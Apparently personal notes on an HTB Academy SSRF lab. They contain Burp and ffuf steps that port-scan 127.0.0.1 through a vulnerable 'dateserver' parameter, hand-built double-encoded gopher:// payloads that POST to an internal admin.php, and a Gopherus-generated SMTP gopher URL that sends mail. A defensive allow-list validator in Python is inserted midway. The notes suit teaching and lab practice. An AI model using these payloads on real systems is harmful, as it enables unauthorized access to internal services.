ENUMERATION
SERVICE/PORT SCANNING
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:80&date=2024-01-02
- change the port number to determine which ports are closed
- the error message returned for closed ports is what ffuf filters on to identify open ports
- "Failed to connect..."
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"
* -fr means filter regexp
80 [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]
PAGE FUZZING
#determine the web server's response on a non-existing page
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/validPage.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/invalidPage.php&date=2024-01-02
- the error message is what ffuf filters on to identify non-existent pages
root@oco:~$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://{targetSite:port}/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"
* a "404 not found" error msg could be used, but it won't filter any HTTP 403 responses
- to do so, use "Server at dateserver.htb Port 80"
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/admin.php&date=2024-01-02
- since dateserver.htb may be an internal resource, the /admin.php page cannot be reached directly.
- for this type of access, you'll need to use the gopher (https://datatracker.ietf.org/doc/html/rfc1436) URL scheme to send arbitrary bytes to a TCP socket.
- This protocol enables the attacker to create a POST request by building the HTTP request themselves.
#craft the payload
POST /admin.php HTTP/1.1
Host: dateserver.htb
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
adminpw=admin
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin
* all special characters MUST be URL-encoded, spaces (%20) and newlines (%0D%0A) in particular
- since we are sending our URL within the HTTP POST parameter dateserver, which itself is URL-encoded, we need to URL-encode the entire URL again to ensure the correct format of the URL after the web server accepts it. Otherwise, we will get a Malformed URL error
#use Gopherus to generate syntactically and semantically correct gopher URLs
#https://github.com/tarunkant/Gopherus
#Gopherus supports the following services: MySQL, PostgreSQL, FastCGI, Redis, SMTP, Zabbix, pymemcache, rbmemcache, phpmemcache, dmpmemcache
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01
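The server-side control that closes this issue is allow-list validation of the dateserver value before it is fetched. The following is an added example, not code from these notes or from the target application; it assumes dateserver.htb is the only legitimate upstream, reachable on ports 80/443, and that the web server decodes the form value once before the application sees it.

```python
# Added example (not from the notes): allow-list validation of the
# user-supplied 'dateserver' value before the application fetches it.
# Assumptions: dateserver.htb is the only legitimate upstream, on 80/443.
import ipaddress
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"dateserver.htb"}   # assumed allow-list
ALLOWED_SCHEMES = {"http", "https"}  # no gopher://, file://, dict:// ...
ALLOWED_PORTS = {None, 80, 443}      # None = scheme default


def validate_dateserver_url(url: str) -> tuple[bool, str]:
    """Return (ok, reason) for the URL the application is about to fetch."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    host = parts.hostname          # already lower-cased by urlsplit
    if not host:
        return False, "missing host"
    # Defence in depth: an IP literal must never point at loopback,
    # private or link-local space (the 127.0.0.1 port scan above).
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local
                           or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
        return False, f"non-public address: {host}"
    if host not in ALLOWED_HOSTS:
        return False, f"host not in allow-list: {host}"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    return True, "ok"


def check_form_value(raw_value: str) -> tuple[bool, str]:
    """Validate exactly what the fetcher will use: the form value decoded
    once by the web server. A double-encoded gopher payload therefore
    shows up here as gopher:// and is rejected on scheme."""
    return validate_dateserver_url(unquote(raw_value))
```

Validate the same decoded form the fetching code uses; checking the still-encoded body, or decoding twice, lets the check and the fetcher disagree about the URL.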
#use the procedure below for internal SMTP (if any)
root@oco:~$ python2.7 gopherus.py
#generate a valid SMTP URL
#the generated gopher SMTP URL can then be used in SSRF exploitation
root@oco:~$ python2.7 gopherus.py --exploit smtp
Give Details to send mail:
Mail from : attacker@academy.htb
Mail To : victim@academy.htb
Subject : HelloWorld
Message : Hello from SSRF!
Your gopher link is ready to send Mail:
gopher://127.0.0.1:25/_MAIL%20FROM:attacker%40academy.htb%0ARCPT%20To:victim%40academy.htb%0ADATA%0AFrom:attacker%40academy.htb%0ASubject:HelloWorld%0AMessage:Hello%20from%20SSRF%21%0A